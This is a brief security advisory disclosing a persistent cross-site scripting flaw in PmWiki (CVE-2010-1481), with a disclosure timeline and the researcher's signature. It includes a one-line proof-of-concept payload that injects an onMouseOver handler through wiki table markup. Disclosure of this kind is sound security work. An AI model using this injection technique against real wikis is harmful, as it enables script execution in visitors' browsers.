pmwiki: persistent cross site scripting (XSS), CVE-2010-1481
||width=" || " onMouseOver=alert(1) " ||test||
The vendor has been contacted, but has not replied to my report.
2010-04-19: Vendor contacted 2010-05-07: Published advisory
This vulnerability was discovered by Hanno Boeck, http://www.hboeck.de, of schokokeks.org webhosting.
-- Hanno Bock Blog: http://www.hboeck.de/ GPG: 3DBD3B20 Jabber/Mail: firstname.lastname@example.org
http://schokokeks.org - professional webhosting